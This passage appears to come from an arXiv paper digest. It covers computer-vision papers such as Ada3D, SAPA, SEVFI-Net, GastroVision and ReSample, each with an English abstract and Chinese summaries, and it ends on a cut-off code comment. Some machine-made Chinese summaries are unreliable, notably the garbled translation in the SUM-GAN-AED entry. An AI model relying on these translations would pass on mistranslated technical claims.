  • methods: 提出了一种新颖的立体事件驱动VFI网络（SEVFI-Net），通过特征聚合模块（FAM）缓解视差并在特征域实现空间对齐，进而结合光流与视差估计，生成高质量的中间帧及对应的视差。
  • results: 在公开的真实立体数据集（DSEC和MVSEC）以及我们自行采集的立体事件-强度数据集（SEID）上的实验表明，对于包含复杂运动和不同深度的真实场景，所提出的SEVFI-Net显著优于现有的E-VFI方法。
    Abstract The stereo event-intensity camera setup is widely applied to leverage the advantages of both event cameras with low latency and intensity cameras that capture accurate brightness and texture information. However, such a setup commonly encounters cross-modality parallax that is difficult to be eliminated solely with stereo rectification especially for real-world scenes with complex motions and varying depths, posing artifacts and distortion for existing Event-based Video Frame Interpolation (E-VFI) approaches. To tackle this problem, we propose a novel Stereo Event-based VFI (SE-VFI) network (SEVFI-Net) to generate high-quality intermediate frames and corresponding disparities from misaligned inputs consisting of two consecutive keyframes and event streams emitted between them. Specifically, we propose a Feature Aggregation Module (FAM) to alleviate the parallax and achieve spatial alignment in the feature domain. We then exploit the fused features accomplishing accurate optical flow and disparity estimation, and achieving better interpolated results through flow-based and synthesis-based ways. We also build a stereo visual acquisition system composed of an event camera and an RGB-D camera to collect a new Stereo Event-Intensity Dataset (SEID) containing diverse scenes with complex motions and varying depths. Experiments on public real-world stereo datasets, i.e., DSEC and MVSEC, and our SEID dataset demonstrate that our proposed SEVFI-Net outperforms state-of-the-art methods by a large margin.
    摘要 立体的事件相机-强度相机配置被广泛应用，以同时利用事件相机低延迟和强度相机能够采集准确亮度与纹理信息的优点。然而，这种配置通常会遇到跨模态视差，仅靠立体校正难以消除，尤其是在运动复杂、深度变化的真实场景中，这给现有的基于事件的视频帧插值（E-VFI）方法带来了伪影和畸变。为了解决该问题，我们提出了一种新颖的立体事件驱动VFI（SE-VFI）网络（SEVFI-Net），可从未对齐的输入（两个连续关键帧以及其间的事件流）生成高质量的中间帧及对应的视差。具体而言，我们提出了特征聚合模块（FAM）以缓解视差并在特征域实现空间对齐；随后利用融合后的特征完成精确的光流与视差估计，并通过基于光流与基于合成两种方式获得更好的插帧结果。我们还搭建了由事件相机和RGB-D相机组成的立体视觉采集系统，收集了一个新的立体事件-强度数据集（SEID），其中包含运动复杂、深度多样的各种场景。在公开的真实立体数据集DSEC和MVSEC以及我们的SEID数据集上的实验表明，所提出的SEVFI-Net大幅超越了现有方法。

Ada3D : Exploiting the Spatial Redundancy with Adaptive Inference for Efficient 3D Object Detection

  • paper_url: http://arxiv.org/abs/2307.08209
  • repo_url: None
  • paper_authors: Tianchen Zhao, Xuefei Ning, Ke Hong, Zhongyuan Qiu, Pu Lu, Yali Zhao, Linfeng Zhang, Lipu Zhou, Guohao Dai, Huazhong Yang, Yu Wang
  • for: 本研究旨在提高自动驾驶中3D目标检测的效率，使其能够在资源受限的车辆上运行。
  • methods: 采用自适应推理框架，在轻量级重要性预测器的引导下滤除输入中的空间冗余点；同时利用2D BEV特征图固有的稀疏性，降低计算与显存开销。
  • results: 在不牺牲精度的情况下，将3D voxel减少40%，并将2D BEV特征图的密度从100%降至20%；模型的计算与显存开销降低至原来的1/5，3D和2D骨干分别获得1.52x/1.45x的端到端GPU延迟优化和1.5x/4.5x的GPU峰值显存优化。
    Abstract Voxel-based methods have achieved state-of-the-art performance for 3D object detection in autonomous driving. However, their significant computational and memory costs pose a challenge for their application to resource-constrained vehicles. One reason for this high resource consumption is the presence of a large number of redundant background points in Lidar point clouds, resulting in spatial redundancy in both 3D voxel and dense BEV map representations. To address this issue, we propose an adaptive inference framework called Ada3D, which focuses on exploiting the input-level spatial redundancy. Ada3D adaptively filters the redundant input, guided by a lightweight importance predictor and the unique properties of the Lidar point cloud. Additionally, we utilize the BEV features' intrinsic sparsity by introducing the Sparsity Preserving Batch Normalization. With Ada3D, we achieve 40% reduction for 3D voxels and decrease the density of 2D BEV feature maps from 100% to 20% without sacrificing accuracy. Ada3D reduces the model computational and memory cost by 5x, and achieves 1.52x/1.45x end-to-end GPU latency and 1.5x/4.5x GPU peak memory optimization for the 3D and 2D backbone respectively.
    摘要 基于体素（voxel）的方法已在自动驾驶3D目标检测中取得最先进的性能。然而，其巨大的计算与显存开销给资源受限的车辆平台带来了挑战。其中一个原因是LiDAR点云中存在大量冗余的背景点，导致3D体素和稠密BEV特征图表示中的空间冗余。为解决这一问题，我们提出了一种自适应推理框架Ada3D，重点利用输入层面的空间冗余：在轻量级重要性预测器的引导下，并结合LiDAR点云的独有特性，自适应地滤除冗余输入。此外，我们利用BEV特征固有的稀疏性，引入了稀疏性保持的批归一化（Sparsity Preserving Batch Normalization）。借助Ada3D，我们在不牺牲精度的情况下将3D体素减少40%，并将2D BEV特征图的密度从100%降至20%。Ada3D将模型的计算与显存开销降低至原来的1/5，并分别为3D和2D骨干带来1.52x/1.45x的端到端GPU延迟优化和1.5x/4.5x的GPU峰值显存优化。

Unbiased Image Synthesis via Manifold-Driven Sampling in Diffusion Models

  • paper_url: http://arxiv.org/abs/2307.08199
  • repo_url: None
  • paper_authors: Xingzhe Su, Yi Ren, Wenwen Qiang, Zeen Song, Hang Gao, Fengge Wu, Changwen Zheng
  • for: 本研究旨在解决扩散模型中的数据偏差问题，尤其是当训练数据不能准确代表真实数据分布、呈现偏斜或不均衡模式时。
  • methods: 我们提出了一种利用流形引导来缓解扩散模型数据偏差的新方法：其核心思想是用无监督方法估计训练数据的流形，再用它引导扩散模型的采样过程，使生成的图像在数据流形上均匀分布，且无需修改模型架构或重新训练。
  • results: 理论分析和实验证据表明，与标准扩散模型相比，该方法能够提高图像生成的质量和无偏性；具体而言，可以生成更加多样、均衡的图像，并提升下游应用的鲁棒性。
    Abstract Diffusion models are a potent class of generative models capable of producing high-quality images. However, they can face challenges related to data bias, favoring specific modes of data, especially when the training data does not accurately represent the true data distribution and exhibits skewed or imbalanced patterns. For instance, the CelebA dataset contains more female images than male images, leading to biased generation results and impacting downstream applications. To address this issue, we propose a novel method that leverages manifold guidance to mitigate data bias in diffusion models. Our key idea is to estimate the manifold of the training data using an unsupervised approach, and then use it to guide the sampling process of diffusion models. This encourages the generated images to be uniformly distributed on the data manifold without altering the model architecture or necessitating labels or retraining. Theoretical analysis and empirical evidence demonstrate the effectiveness of our method in improving the quality and unbiasedness of image generation compared to standard diffusion models.
    摘要 扩散模型是一类强大的生成模型，能够生成高质量图像。然而，当训练数据不能准确反映真实数据分布、呈现偏斜或不均衡模式时，它们可能面临数据偏差问题，倾向于生成特定模式的数据。例如，CelebA数据集中女性图像多于男性图像，导致生成结果存在偏差并影响下游应用。为解决这一问题，我们提出了一种利用流形引导来缓解扩散模型数据偏差的新方法。其关键思想是用无监督方法估计训练数据的流形，然后用它引导扩散模型的采样过程，使生成图像在数据流形上均匀分布，而无需修改模型架构、提供标签或重新训练。理论分析和实验证据表明，与标准扩散模型相比，该方法能够提升图像生成的质量与无偏性。

On Point Affiliation in Feature Upsampling

  • paper_url: http://arxiv.org/abs/2307.08198
  • repo_url: https://github.com/tiny-smart/sapa
  • paper_authors: Wenze Liu, Hao Lu, Yuliang Liu, Zhiguo Cao
  • for: The paper aims to improve feature upsampling in dense prediction tasks, specifically addressing the problem of point affiliation.
  • methods: The paper introduces the notion of point affiliation and presents Similarity-Aware Point Affiliation (SAPA), a novel, lightweight, and universal upsampling solution. SAPA uses a generic formulation for generating similarity-aware upsampling kernels, which encourage not only semantic smoothness but also boundary sharpness.
  • results: SAPA outperforms prior upsamplers and consistently improves performance on a number of dense prediction tasks, including semantic segmentation, object detection, instance segmentation, panoptic segmentation, image matting, and depth estimation.
    Abstract We introduce the notion of point affiliation into feature upsampling. By abstracting a feature map into non-overlapped semantic clusters formed by points of identical semantic meaning, feature upsampling can be viewed as point affiliation -- designating a semantic cluster for each upsampled point. In the framework of kernel-based dynamic upsampling, we show that an upsampled point can resort to its low-res decoder neighbors and high-res encoder point to reason the affiliation, conditioned on the mutual similarity between them. We therefore present a generic formulation for generating similarity-aware upsampling kernels and prove that such kernels encourage not only semantic smoothness but also boundary sharpness. This formulation constitutes a novel, lightweight, and universal upsampling solution, Similarity-Aware Point Affiliation (SAPA). We show its working mechanism via our preliminary designs with window-shape kernel. After probing the limitations of the designs on object detection, we reveal additional insights for upsampling, leading to SAPA with the dynamic kernel shape. Extensive experiments demonstrate that SAPA outperforms prior upsamplers and invites consistent performance improvements on a number of dense prediction tasks, including semantic segmentation, object detection, instance segmentation, panoptic segmentation, image matting, and depth estimation. Code is made available at: https://github.com/tiny-smart/sapa
    摘要 我们将点归属（point affiliation）的概念引入特征上采样。通过将特征图抽象为由语义相同的点构成的互不重叠的语义簇，特征上采样可以被视为点归属问题——为每个上采样点指定一个语义簇。在基于核的动态上采样框架中，我们表明上采样点可以依据其低分辨率解码器邻居与高分辨率编码器点之间的相似度来推断其归属。因此，我们提出了一种生成相似度感知上采样核的通用公式，并证明这类核不仅促进语义平滑，也促进边界清晰。这一公式构成了一种新颖、轻量且通用的上采样方案：相似度感知点归属（SAPA）。我们首先通过窗口形核的初步设计展示其工作机制；在分析该设计在目标检测上的局限后，我们获得了关于上采样的更多启示，进而提出了具有动态核形状的SAPA。大量实验表明，SAPA优于此前的上采样算子，并在语义分割、目标检测、实例分割、全景分割、图像抠图和深度估计等多个稠密预测任务上带来一致的性能提升。代码见：https://github.com/tiny-smart/sapa
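A rough sketch of a similarity-aware upsampling kernel in the spirit described above: each high-resolution location builds a softmax kernel from the similarity between its encoder feature and the decoder features of the surrounding low-resolution neighborhood, then uses that kernel to upsample the decoder features. The window size, dot-product similarity, and absence of learned projections are simplifications rather than the SAPA design.

```python
import torch
import torch.nn.functional as F

def similarity_aware_upsample(decoder_lr, encoder_hr, scale=2, k=3):
    """decoder_lr: (B, C, h, w) low-res decoder features to be upsampled.
    encoder_hr: (B, C, H, W) high-res encoder features with H = h*scale, W = w*scale.
    Returns upsampled decoder features of shape (B, C, H, W)."""
    B, C, h, w = decoder_lr.shape
    H, W = h * scale, w * scale
    # Nearest-neighbor lift of the decoder features, then gather k x k neighborhoods.
    dec_up = F.interpolate(decoder_lr, size=(H, W), mode="nearest")
    neigh = F.unfold(dec_up, kernel_size=k, padding=k // 2)        # (B, C*k*k, H*W)
    neigh = neigh.reshape(B, C, k * k, H * W)
    # Similarity (dot product) between each HR encoder point and its decoder neighborhood.
    query = encoder_hr.reshape(B, C, 1, H * W)
    kernel = F.softmax((neigh * query).sum(dim=1), dim=1)          # (B, k*k, H*W)
    out = (neigh * kernel.unsqueeze(1)).sum(dim=2)                 # (B, C, H*W)
    return out.reshape(B, C, H, W)

dec = torch.randn(1, 8, 16, 16)
enc = torch.randn(1, 8, 32, 32)
print(similarity_aware_upsample(dec, enc).shape)  # torch.Size([1, 8, 32, 32])
```

Because the kernel is driven by encoder/decoder similarity rather than fixed bilinear weights, an upsampled point near a boundary is pulled toward the semantic cluster it actually belongs to, which is the "point affiliation" intuition.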

Zero-Shot Image Harmonization with Generative Model Prior

  • paper_url: http://arxiv.org/abs/2307.08182
  • repo_url: https://github.com/windvchen/diff-harmonization
  • paper_authors: Jianqi Chen, Zhengxia Zou, Yilan Zhang, Keyan Chen, Zhenwei Shi
  • for: 本文旨在提出一种零shot图像协调方法,不需要大量的合成图像训练。
  • methods: 我们借鉴人类行为，利用预训练生成模型蕴含的自然图像先验来模拟人类对和谐图像的偏好，并提出注意力约束文本（Attention-Constraint Text）来指引协调方向。
  • results: 我们的方法可以具有高效性和一致性,并且可以保持前景内容结构。广泛的实验证明了我们的方法的有效性,并且我们还探索了一些有趣的应用场景。
    Abstract Recent image harmonization methods have demonstrated promising results. However, due to their heavy reliance on a large number of composite images, these works are expensive in the training phase and often fail to generalize to unseen images. In this paper, we draw lessons from human behavior and come up with a zero-shot image harmonization method. Specifically, in the harmonization process, a human mainly utilizes his long-term prior on harmonious images and makes a composite image close to that prior. To imitate that, we resort to pretrained generative models for the prior of natural images. For the guidance of the harmonization direction, we propose an Attention-Constraint Text which is optimized to well illustrate the image environments. Some further designs are introduced for preserving the foreground content structure. The resulting framework, highly consistent with human behavior, can achieve harmonious results without burdensome training. Extensive experiments have demonstrated the effectiveness of our approach, and we have also explored some interesting applications.
    摘要 最近的图像协调方法已经展现出可观的效果，但由于严重依赖大量合成图像，这些方法训练成本高昂，且往往难以泛化到未见过的图像。本文借鉴人类行为，提出了一种零样本图像协调方法。具体而言，人在进行协调时主要依赖其对和谐图像的长期先验，使合成图像尽量贴近这一先验。为了模仿这一点，我们利用预训练生成模型提供的自然图像先验；为了指引协调方向，我们提出了经过优化、能够充分描述图像环境的注意力约束文本（Attention-Constraint Text），并引入若干用于保持前景内容结构的额外设计。最终的框架与人类行为高度一致，无需繁重的训练即可获得和谐的结果。大量实验证明了我们方法的有效性，我们还探索了一些有趣的应用。

Boundary-weighted logit consistency improves calibration of segmentation networks

  • paper_url: http://arxiv.org/abs/2307.08163
  • repo_url: None
  • paper_authors: Neerav Karani, Neel Dey, Polina Golland
  • for: 该论文旨在解决神经网络预测概率与准确率之间相关性较弱（即校准不佳）的问题，以及图像分割数据中固有的标签模糊性带来的影响。
  • methods: 该论文利用随机变换下logit的一致性作为空间变化的正则项，防止在标签模糊的像素处产生过度自信的预测，并提出了边界加权的扩展以获得更好的校准。
  • results: 该方法在前列腺和心脏MRI分割上取得了最先进的校准效果。
    Abstract Neural network prediction probabilities and accuracy are often only weakly-correlated. Inherent label ambiguity in training data for image segmentation aggravates such miscalibration. We show that logit consistency across stochastic transformations acts as a spatially varying regularizer that prevents overconfident predictions at pixels with ambiguous labels. Our boundary-weighted extension of this regularizer provides state-of-the-art calibration for prostate and heart MRI segmentation.
    摘要 神经网络的预测概率与准确率往往只存在弱相关。图像分割训练数据中固有的标签模糊性会进一步加剧这种校准不良。我们表明，随机变换下的logit一致性相当于一种空间变化的正则项，可以防止在标签模糊的像素处产生过度自信的预测。我们提出的边界加权扩展在前列腺和心脏MRI分割上取得了最先进的校准效果。
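The abstract describes a logit-consistency regularizer under stochastic transformations, weighted toward boundary pixels; a rough PyTorch-style sketch is below. The choice of transformation (a flip), the boundary-weight construction from label edges, and the squared-error form are illustrative assumptions, not the paper's exact formulation.

```python
import torch
import torch.nn.functional as F

def boundary_weights(labels: torch.Tensor, dilations: int = 2) -> torch.Tensor:
    """Weight map that is 1 near label boundaries and smaller elsewhere.
    labels: (B, 1, H, W) integer segmentation masks."""
    lab = labels.float()
    edge = (F.max_pool2d(lab, 3, 1, 1) != -F.max_pool2d(-lab, 3, 1, 1)).float()
    for _ in range(dilations):                      # thicken the boundary band
        edge = F.max_pool2d(edge, 3, 1, 1)
    return 0.1 + 0.9 * edge                         # background weight 0.1, boundary 1.0

def consistency_loss(model, images, labels):
    """Penalize disagreement of logits under a stochastic flip, boundary-weighted."""
    flip = lambda x: torch.flip(x, dims=[-1])
    logits_a = model(images)
    logits_b = flip(model(flip(images)))            # predict on flipped input, flip back
    w = boundary_weights(labels)
    return (w * (logits_a - logits_b).pow(2).mean(dim=1, keepdim=True)).mean()

# Toy check with a trivial "model":
model = torch.nn.Conv2d(1, 4, 3, padding=1)
images = torch.randn(2, 1, 64, 64)
labels = torch.randint(0, 3, (2, 1, 64, 64))
print(consistency_loss(model, images, labels).item())
```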

Self-Attention Based Generative Adversarial Networks For Unsupervised Video Summarization

  • paper_url: http://arxiv.org/abs/2307.08145
  • repo_url: None
  • paper_authors: Maria Nektaria Minaidi, Charilaos Papaioannou, Alexandros Potamianos
  • for: 本文旨在提出一种基于无监督对抗学习的视频摘要生成方法，生成与原始视频难以区分的代表性摘要。
  • methods: 该方法基于一个流行的 Generative Adversarial Network (GAN) 的建立,通过在选择、编码和解码视频帧中引入注意力机制,以模型视频之间的时间关系。提出了 SUM-GAN-AED 模型,combines self-attention mechanism for frame selection with LSTMs for encoding and decoding.
  • results: 在 SumMe、TVSum 和 COGNIMUSE 数据集上的实验结果表明，使用自注意力机制作为帧选择机制在 SumMe 上优于当前最先进方法，在 TVSum 和 COGNIMUSE 上也取得了与最先进方法相当的性能。
    Abstract In this paper, we study the problem of producing a comprehensive video summary following an unsupervised approach that relies on adversarial learning. We build on a popular method where a Generative Adversarial Network (GAN) is trained to create representative summaries, indistinguishable from the originals. The introduction of the attention mechanism into the architecture for the selection, encoding and decoding of video frames, shows the efficacy of self-attention and transformer in modeling temporal relationships for video summarization. We propose the SUM-GAN-AED model that uses a self-attention mechanism for frame selection, combined with LSTMs for encoding and decoding. We evaluate the performance of the SUM-GAN-AED model on the SumMe, TVSum and COGNIMUSE datasets. Experimental results indicate that using a self-attention mechanism as the frame selection mechanism outperforms the state-of-the-art on SumMe and leads to comparable to state-of-the-art performance on TVSum and COGNIMUSE.
    摘要 在这篇论文中,我们研究了一种不需要监督的视频概要生成方法,基于对抗学习。我们建立在一种受欢迎的方法之上,其中一个生成概要网络(GAN)在创造可信任的概要时进行训练。我们通过将注意力机制引入网络架构中,选择、编码和解码视频帧时,以表明自我注意力和变换器在视频概要模型中的有效性。我们提出了SUM-GAN-AED模型,它使用自我注意力机制来选择帧,并使用LSTM来编码和解码。我们在SumMe、TVSum和COGNIMUSE数据集上评估SUM-GAN-AED模型的性能。实验结果表明,使用自我注意力机制来选择帧比预先的状态对SUMMe数据集表现更好,并且在TVSum和COGNIMUSE数据集上表现相当于预先的状态。

Neural Stream Functions

  • paper_url: http://arxiv.org/abs/2307.08142
  • repo_url: https://github.com/skywolf829/neuralstreamfunction
  • paper_authors: Skylar Wolfgang Wurster, Hanqi Guo, Tom Peterka, Han-Wei Shen
  • for: 这个论文是为了计算流函数的,流函数是一个scalar函数,其梯度与给定的vector field垂直。
  • methods: 这个论文使用神经网络方法来学习流函数,输入是vector field,神经网络会学习将输入坐标映射到流函数值上。
  • results: 这个论文的结果表明,使用神经网络方法可以高效地计算流函数,并且可以根据输入vector field的不同来生成不同的流函数解。此外,论文还提出了一些可选的约束来生成流函数解,以便在流场的拟合中提高计算的精度。
    Abstract We present a neural network approach to compute stream functions, which are scalar functions with gradients orthogonal to a given vector field. As a result, isosurfaces of the stream function extract stream surfaces, which can be visualized to analyze flow features. Our approach takes a vector field as input and trains an implicit neural representation to learn a stream function for that vector field. The network learns to map input coordinates to a stream function value by minimizing the inner product of the gradient of the neural network's output and the vector field. Since stream function solutions may not be unique, we give optional constraints for the network to learn particular stream functions of interest. Specifically, we introduce regularizing loss functions that can optionally be used to generate stream function solutions whose stream surfaces follow the flow field's curvature, or that can learn a stream function that includes a stream surface passing through a seeding rake. We also discuss considerations for properly visualizing the trained implicit network and extracting artifact-free surfaces. We compare our results with other implicit solutions and present qualitative and quantitative results for several synthetic and simulated vector fields.
    摘要 我们提出了一种用神经网络计算流函数的方法。流函数是一种标量函数，其梯度与给定的向量场正交，因此流函数的等值面即为流面，可用于可视化并分析流场特征。我们的方法以向量场为输入，训练一个隐式神经表示来学习该向量场的流函数：网络学习将输入坐标映射到流函数值，训练目标是最小化网络输出的梯度与向量场的内积。由于流函数的解可能不唯一，我们提供了可选的约束，使网络学习特定的目标流函数。具体而言，我们引入了可选的正则化损失函数，使所得流函数的流面跟随流场的曲率，或使学到的流函数包含一张穿过给定种子线（seeding rake）的流面。我们还讨论了如何正确地可视化训练好的隐式网络并提取无伪影的流面。我们将结果与其他隐式解法进行了比较，并在多个合成与模拟向量场上给出了定性与定量结果。
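The training objective stated above — make the gradient of the learned scalar field orthogonal to the given vector field — is easy to write down with automatic differentiation. The tiny MLP, the squared penalty, and the analytic toy vector field below are placeholders, not the paper's network or regularizers.

```python
import torch
import torch.nn as nn

class StreamFunctionMLP(nn.Module):
    def __init__(self, hidden=64):
        super().__init__()
        self.net = nn.Sequential(nn.Linear(3, hidden), nn.SiLU(),
                                 nn.Linear(hidden, hidden), nn.SiLU(),
                                 nn.Linear(hidden, 1))
    def forward(self, x):
        return self.net(x)

def orthogonality_loss(model, x, v):
    """Penalize the inner product between grad f(x) and the vector field v(x)."""
    x = x.requires_grad_(True)
    f = model(x)
    grad_f = torch.autograd.grad(f.sum(), x, create_graph=True)[0]
    return (grad_f * v).sum(dim=-1).pow(2).mean()

model = StreamFunctionMLP()
opt = torch.optim.Adam(model.parameters(), lr=1e-3)
for step in range(200):
    x = torch.rand(1024, 3) * 2 - 1                      # sample points in [-1, 1]^3
    v = torch.stack([-x[:, 1], x[:, 0],                  # toy solid-body rotation field
                     torch.zeros_like(x[:, 0])], dim=-1)
    loss = orthogonality_loss(model, x, v)
    opt.zero_grad(); loss.backward(); opt.step()
```

Without additional constraints such a network could collapse toward a constant function; the optional regularizers mentioned in the abstract (curvature-following surfaces, a surface through a seeding rake) address exactly that kind of degeneracy.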

Adaptively Placed Multi-Grid Scene Representation Networks for Large-Scale Data Visualization

  • paper_url: http://arxiv.org/abs/2308.02494
  • repo_url: https://github.com/skywolf829/apmgsrn
  • paper_authors: Skylar Wolfgang Wurster, Tianyu Xiong, Han-Wei Shen, Hanqi Guo, Tom Peterka
  • for: 本文提出了一种自适应的场景表示网络（SRN），以便更好地压缩和可视化科学数据。
  • methods: 该方法使用多个空间自适应的特征网格（APMGSRN），并提出了域分解的训练与推理技术，以加速多GPU系统上的并行训练；同时发布了一个开源的神经体渲染应用，可对任何基于PyTorch的SRN进行即插即用的渲染。
  • results: 所提出的APMGSRN架构通过学习特征网格在域内的放置位置，将更多的网络容量动态分配到误差较大的区域，从而在无需此前自适应模型所依赖的昂贵八叉树细化、剪枝与遍历的情况下，提升SRN对科学数据的重建精度。
    Abstract Scene representation networks (SRNs) have been recently proposed for compression and visualization of scientific data. However, state-of-the-art SRNs do not adapt the allocation of available network parameters to the complex features found in scientific data, leading to a loss in reconstruction quality. We address this shortcoming with an adaptively placed multi-grid SRN (APMGSRN) and propose a domain decomposition training and inference technique for accelerated parallel training on multi-GPU systems. We also release an open-source neural volume rendering application that allows plug-and-play rendering with any PyTorch-based SRN. Our proposed APMGSRN architecture uses multiple spatially adaptive feature grids that learn where to be placed within the domain to dynamically allocate more neural network resources where error is high in the volume, improving state-of-the-art reconstruction accuracy of SRNs for scientific data without requiring expensive octree refining, pruning, and traversal like previous adaptive models. In our domain decomposition approach for representing large-scale data, we train an set of APMGSRNs in parallel on separate bricks of the volume to reduce training time while avoiding overhead necessary for an out-of-core solution for volumes too large to fit in GPU memory. After training, the lightweight SRNs are used for realtime neural volume rendering in our open-source renderer, where arbitrary view angles and transfer functions can be explored. A copy of this paper, all code, all models used in our experiments, and all supplemental materials and videos are available at https://github.com/skywolf829/APMGSRN.
    摘要 场景表示网络（SRN）最近被提出用于科学数据的压缩与可视化。然而，当前最先进的SRN并不会根据科学数据中的复杂特征来调整可用网络参数的分配，导致重建质量受损。我们通过自适应放置的多网格SRN（APMGSRN）解决这一不足，并提出了域分解的训练与推理技术，用于在多GPU系统上加速并行训练。我们还发布了一个开源的神经体渲染应用，支持任意基于PyTorch的SRN即插即用渲染。所提出的APMGSRN架构使用多个空间自适应特征网格，学习其在域内的放置位置，从而将更多的神经网络容量动态分配到体数据中误差较大的区域；与以往的自适应模型不同，它无需昂贵的八叉树细化、剪枝和遍历，即可提升SRN对科学数据的重建精度。在表示大规模数据的域分解方案中，我们将体数据划分为若干块并行训练一组APMGSRN，从而在避免体数据超出GPU显存时所需的核外（out-of-core）处理开销的同时缩短训练时间。训练完成后，这些轻量级SRN可在我们的开源渲染器中用于实时神经体渲染，支持探索任意视角和传输函数。本文副本、全部代码、实验中使用的所有模型以及全部补充材料和视频均可在 https://github.com/skywolf829/APMGSRN 获取。

GastroVision: A Multi-class Endoscopy Image Dataset for Computer Aided Gastrointestinal Disease Detection

  • paper_url: http://arxiv.org/abs/2307.08140
  • repo_url: https://github.com/debeshjha/gastrovision
  • paper_authors: Debesh Jha, Vanshali Sharma, Neethi Dasu, Nikhil Kumar Tomar, Steven Hicks, M. K. Bhuyan, Pradip K. Das, Michael A. Riegler, Pål Halvorsen, Ulas Bagci, Thomas de Lange
  • for: 这个研究旨在提供一个大规模、精确标注的消化道内镜数据集，以便用于消化道疾病检测和分类的人工智能（AI）系统开发。
  • methods: 这个研究构建了多中心、开放获取的消化道内镜数据集，涵盖不同的解剖标志、病理异常、息肉切除病例和正常所见（共27个类别）。数据集包含8,000张分别采集自挪威巴鲁姆医院和瑞典卡罗琳斯卡大学医院的内镜图像，并由经验丰富的消化内镜医师进行标注和核验。
  • results: 研究人员基于流行的深度学习基线模型进行了广泛的基准比较，验证了数据集的价值，并认为该数据集可以促进用于消化道疾病检测与分类的AI系统的开发。
    Abstract Integrating real-time artificial intelligence (AI) systems in clinical practices faces challenges such as scalability and acceptance. These challenges include data availability, biased outcomes, data quality, lack of transparency, and underperformance on unseen datasets from different distributions. The scarcity of large-scale, precisely labeled, and diverse datasets are the major challenge for clinical integration. This scarcity is also due to the legal restrictions and extensive manual efforts required for accurate annotations from clinicians. To address these challenges, we present \textit{GastroVision}, a multi-center open-access gastrointestinal (GI) endoscopy dataset that includes different anatomical landmarks, pathological abnormalities, polyp removal cases and normal findings (a total of 27 classes) from the GI tract. The dataset comprises 8,000 images acquired from B{\ae}rum Hospital in Norway and Karolinska University Hospital in Sweden and was annotated and verified by experienced GI endoscopists. Furthermore, we validate the significance of our dataset with extensive benchmarking based on the popular deep learning based baseline models. We believe our dataset can facilitate the development of AI-based algorithms for GI disease detection and classification. Our dataset is available at \url{https://osf.io/84e7f/}.
    摘要 将实时人工智能（AI）系统整合到临床实践中面临可扩展性与可接受度等挑战，包括数据可得性、结果偏倚、数据质量、缺乏透明度，以及在来自不同分布的未见数据集上表现不佳。其中，大规模、精确标注且多样化数据集的稀缺是临床整合的主要障碍；这种稀缺也源于法律限制以及临床医生进行精确标注所需的大量人工工作。为了应对这些挑战，我们提出了GastroVision：一个多中心、开放获取的消化道（GI）内镜数据集，涵盖消化道的不同解剖标志、病理异常、息肉切除病例与正常所见，共27个类别。该数据集包含8,000张图像，采集自挪威巴鲁姆医院和瑞典卡罗琳斯卡大学医院，并由经验丰富的消化内镜医师进行标注和核验。此外，我们基于流行的深度学习基线模型进行了广泛的基准测试，验证了该数据集的价值。我们相信该数据集能够促进用于消化道疾病检测与分类的AI算法的开发。数据集可在 https://osf.io/84e7f/ 获取。

Solving Inverse Problems with Latent Diffusion Models via Hard Data Consistency

  • paper_url: http://arxiv.org/abs/2307.08123
  • repo_url: None
  • paper_authors: Bowen Song, Soo Min Kwon, Zecheng Zhang, Xinyu Hu, Qing Qu, Liyue Shen
  • for: 解决 inverse problems 的泛化问题
  • methods: 使用 pre-trained latent diffusion models 和 hard data consistency 技术
  • results: 能够重建高质量图像,在线性和非线性 inverse problems 上均优于在像素空间中运行的 state-of-the-art 方法
    Abstract Diffusion models have recently emerged as powerful generative priors for solving inverse problems. However, training diffusion models in the pixel space are both data intensive and computationally demanding, which restricts their applicability as priors in domains such as medical imaging. Latent diffusion models, which operate in a much lower-dimensional space, offer a solution to these challenges. Though, their direct application to solving inverse problems remains an unsolved technical challenge due to the nonlinearity of the encoder and decoder. To address this issue,we propose ReSample, an algorithm that solves general inverse problems with pre-trained latent diffusion models. Our algorithm incorporates data consistency by solving an optimization problem during the reverse sampling process, a concept that we term as hard data consistency. Upon solving this optimization problem, we propose a novel resampling scheme to map the measurement-consistent sample back onto the correct data manifold. Our approach offers both memory efficiency and considerable flexibility in the sense that (1) it can be readily adapted to various inverse problems using the same pre-trained model as it does not assume any fixed forward measurement operator during training, and (2) it can be generalized to different domains by simply fine-tuning the latent diffusion model with a minimal amount of data samples. Our empirical results on both linear and non-linear inverse problems demonstrate that our approach can reconstruct high-quality images even compared to state-of-the-art works that operate in the pixel space.
    摘要 扩散模型最近已成为求解 inverse problems 的强大生成先验。然而,在像素空间中训练扩散模型既需要大量数据又计算开销巨大,这限制了它们作为先验在医学成像等领域的应用。隐空间扩散模型(latent diffusion models)在维度低得多的空间中运行,为这些挑战提供了解决方案。然而,由于编码器和解码器的非线性,将其直接用于求解 inverse problems 仍是一个尚未解决的技术难题。为此,我们提出了 ReSample 算法,利用预训练的隐空间扩散模型求解一般的 inverse problems。该算法在反向采样过程中通过求解一个优化问题来保证数据一致性,我们将这一概念称为 hard data consistency。在求解该优化问题之后,我们提出了一种新的重采样(resampling)方案,将与测量一致的样本映射回正确的数据流形。我们的方法兼具内存效率和高度灵活性:(1)由于训练时不假设任何固定的前向测量算子,同一个预训练模型可以直接适配各种 inverse problems;(2)只需用极少量数据样本微调隐空间扩散模型,即可推广到不同领域。在线性与非线性 inverse problems 上的实验结果表明,我们的方法能够重建高质量图像,甚至优于在像素空间中运行的 state-of-the-art 方法。
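
As a rough, hedged illustration of the hard data consistency idea described above, the Python sketch below runs a small inner optimization on the latent during reverse sampling and then stochastically blends the result back toward the sampler's own prediction. The `decoder`, the forward operator `A`, and the blending rule are placeholders chosen for clarity, not the authors' exact algorithm.

```python
import torch

def hard_data_consistency(z, decoder, A, y, n_steps=20, lr=1e-2):
    """Refine a latent z so that the decoded image x = decoder(z) agrees with the
    measurements y = A(x). This inner optimization is solved at selected steps of
    the reverse diffusion process (decoder and A are assumed differentiable)."""
    z = z.detach().clone().requires_grad_(True)
    opt = torch.optim.Adam([z], lr=lr)
    for _ in range(n_steps):
        opt.zero_grad()
        loss = ((A(decoder(z)) - y) ** 2).mean()   # measurement-consistency loss
        loss.backward()
        opt.step()
    return z.detach()

def stochastic_resample(z_consistent, z_prior, sigma):
    """Map the measurement-consistent latent back toward the diffusion manifold by
    mixing it with the sampler's unconditional prediction and re-adding noise
    (the mixing weight below is an illustrative assumption)."""
    gamma = sigma ** 2 / (1.0 + sigma ** 2)
    mean = gamma * z_prior + (1.0 - gamma) * z_consistent
    return mean + (gamma ** 0.5) * sigma * torch.randn_like(z_consistent)

# Toy usage with stand-in components (a real setup would use a pretrained LDM's decoder):
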